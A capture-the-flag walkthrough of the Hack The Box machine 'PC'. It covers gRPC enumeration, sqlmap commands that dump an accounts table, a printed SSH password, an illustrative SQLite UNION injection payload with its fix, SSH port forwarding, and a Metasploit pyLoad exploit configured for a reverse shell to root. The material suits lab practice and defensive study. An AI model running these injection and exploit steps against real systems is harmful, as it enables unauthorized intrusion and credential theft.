PC HTB

Hey folks, 

This blog is about cracking the machine named "PC" on Hack The Box. Let's get started with the recon.

Initial Reconnaissance 

Running an Nmap scan against the box with its default port range, we get only one open port, 22 (SSH).

SSH alone is rarely the way in, and Nmap's default scan covers only the 1000 most common ports, so let's scan the full range with Rustscan.

The full scan turns up an unusual port, 50051/tcp, whose service is reported as unknown. A quick search for the port number shows that 50051 is the conventional default port for gRPC.




 Port 50051 - gRPC 

gRPC is a Remote Procedure Call framework for building fast, scalable APIs: a client calls methods on a remote server as if they were local, with messages defined in Protocol Buffers and carried over HTTP/2. Services like this are often bound to loopback or kept behind a gateway rather than exposed directly, so an instance reachable from the network is worth a close look.

Searching for ways to interact with gRPC, I found grpcui, a tool that lets you browse and invoke a gRPC server's methods from a web browser.

INSTALLATION OF grpcui WITH GO 

go install github.com/fullstorydev/grpcui/cmd/grpcui@latest


USAGE 


Point grpcui at the target's port 50051. With no .proto files at hand, it relies on the server's reflection service to discover the available services and methods, then opens a web UI on a random local port, here 127.0.0.1:39385.

Log in with the default credentials (admin:admin):

Select the LoginUser method
Tick the checkbox next to the request message to enable the input fields
Enter admin as the username and admin as the password
Click Invoke to see the response

The response contains the admin's id and a token.

Because grpcui talks to the browser over plain HTTP, the request can be captured in Burp Suite.

Send the request to Repeater and fix the token: grpcui renders it as a bytes literal with a leading b, so strip that prefix and send the bare token string.
 



Now right-click, choose Copy to file, and save the request under any name (the commands below use htb).


SQLMAP 

Run sqlmap against the saved request. In the output the back-end DBMS, highlighted in red, is identified as SQLite:

sqlmap -r htb --batch



SQLite has no separate database names, so there is nothing to select with -D; list the tables directly:

sqlmap -r htb --tables --batch



Using the table name accounts, dump its contents:

sqlmap -r htb -T accounts --dump --batch
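To show why sqlmap could pull the accounts table through a single request parameter, here is an added Python example of my own, not code from the writeup or from the box, that reproduces the bug against a constructed in-memory SQLite database: a lookup that splices the caller's id into its query, the same lookup with a bound parameter, and the UNION payload that makes the first one return account rows. Which field was injectable is not stated above, so modelling it as the id is an assumption; the column names, the messages table and every row are made up.

```python
import sqlite3


# Constructed in-memory stand-in for the SQLite database sqlmap dumped on the box.
# The table name "accounts" comes from the writeup; the column names, the
# "messages" table and every row here are assumptions made for the example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE messages (id INTEGER, message TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("admin", "admin"), ("sau", "ConstructedPassword1")])
    conn.executemany("INSERT INTO messages VALUES (?, ?)",
                     [(1, "hello"), (2, "welcome")])
    return conn


def get_info_vulnerable(conn, id_value):
    """Lookup that splices the caller-supplied id straight into the SQL text.

    This is the shape of bug sqlmap detects: a quote inside a crafted id closes
    the string literal and the rest of the value becomes part of the query.
    """
    query = f"SELECT message FROM messages WHERE id = '{id_value}'"
    return [row[0] for row in conn.execute(query)]


def get_info_fixed(conn, id_value):
    """Same lookup with a bound parameter; the id is only ever treated as data."""
    query = "SELECT message FROM messages WHERE id = ?"
    return [row[0] for row in conn.execute(query, (id_value,))]


# A UNION payload of the kind sqlmap builds once it has confirmed the injection
# and fingerprinted the back end as SQLite: the trailing "--" comments out the
# closing quote that the handler appends.
UNION_PAYLOAD = "1' UNION SELECT username || ':' || password FROM accounts --"


def dump_accounts_via_injection(conn):
    """Account rows that the vulnerable handler leaks although it only
    queries the messages table."""
    leaked = get_info_vulnerable(conn, UNION_PAYLOAD)
    return sorted(r for r in leaked if ":" in r)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id:   ", get_info_vulnerable(db, "1"))
    print("vulnerable, UNION payload:", dump_accounts_via_injection(db))
    print("fixed, normal id:        ", get_info_fixed(db, "1"))
    print("fixed, UNION payload:    ", get_info_fixed(db, UNION_PAYLOAD))
```

With the bound parameter the whole payload is compared against the integer id column as one opaque string, so no row matches and nothing from accounts ever reaches the caller; the fix is the parameter binding, not input filtering.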


As you have probably guessed, these are SSH credentials. Log in straight away with the account you retrieved:

SSH CREDENTIALS 

username: sau
password: HereIsYourPassWord1431

SSH LOGIN 


We got our user flag 




PRIVILEGE ESCALATION 


Run linpeas on the machine.

I noticed a service listening on localhost only, on port 8000.

Now, from your own system, forward that port over the SSH session as sau so it becomes reachable locally (a local SSH port forward).

ss is the modern replacement for netstat and lists the listening sockets; on your machine it confirms the forwarded port is up.
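To make the check that linpeas and ss performed explicit, here is an added Python example of my own, not code from the writeup, that parses constructed ss -tlnp output, reports the ports bound only to loopback (the ones you can reach only by tunnelling through the host), and builds the ssh -L command used to expose such a port on the attacking machine. The sample output is made up to match what the writeup describes, and the user@host value is a placeholder.

```python
# Constructed sample of `ss -tlnp` output, modelled on what linpeas reported on
# the box (a web app on 127.0.0.1:8000). It is not a capture from the machine.
SS_SAMPLE = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       4096    127.0.0.1:8000       0.0.0.0:*
LISTEN  0       4096    0.0.0.0:50051        0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
"""

LOOPBACK = {"127.0.0.1", "[::1]"}


def parse_listeners(ss_output):
    """Return {port: set(local addresses)} for every LISTEN row in ss output."""
    listeners = {}
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header line or a non-listening socket
        # rpartition handles both "127.0.0.1:8000" and "[::]:22"
        addr, _, port = fields[3].rpartition(":")
        listeners.setdefault(int(port), set()).add(addr)
    return listeners


def loopback_only_ports(ss_output):
    """Ports bound to loopback and nowhere else.

    These never show up in an external port scan, which is why the service on
    8000 was invisible from the attacking machine until it was forwarded.
    """
    return sorted(port for port, addrs in parse_listeners(ss_output).items()
                  if addrs and addrs <= LOOPBACK)


def ssh_forward_command(user_at_host, remote_port, local_port=None):
    """The ssh -L invocation that exposes a remote loopback port locally."""
    local_port = local_port or remote_port
    return f"ssh -L {local_port}:127.0.0.1:{remote_port} {user_at_host}"


if __name__ == "__main__":
    for port in loopback_only_ports(SS_SAMPLE):
        print(port, "->", ssh_forward_command("sau@TARGET", port))
```

Port 22 and 50051 are excluded because they are bound to 0.0.0.0 and so were already reachable from outside; only 8000 needs the tunnel.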

RUNNING SERVICE

Browsing to the forwarded port shows that the service on 8000 is pyLoad.

EXPLOIT FOR PYLOAD 

A Google search turned up a Metasploit module for pyLoad that gives code execution as the user running the service. The module was released recently and may not be in your installed copy of Metasploit yet, so fetch it straight from the framework's repository with wget:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/pyload_js2py_exec.rb

After downloading, place it under your local module directory at the same relative path as in the repository (~/.msf4/modules/exploits/linux/http/), as shown in the image below; msfconsole loads modules from there, and that path determines the name you pass to use.

copy to the default folder

run ls to check that it was copied

METASPLOIT 


Now run Metasploit with the commands below:

msfconsole

use exploit/linux/http/pyload_js2py_exec

set RHOSTS 127.0.0.1
set RPORT <local port of your forward, 8000 if you kept the same port>
set LHOST <your machine's tun0 IP>
exploit

RHOSTS and RPORT point at the local end of the port forward, so the exploit travels through the SSH tunnel to pyLoad; the reverse payload connects back to LHOST, so give it the tun0 address the target can reach.

If you get a Meterpreter session, type shell and you are on the machine as root, since pyLoad is running as root on this box.


ROOT FLAG 🎊

root flag 
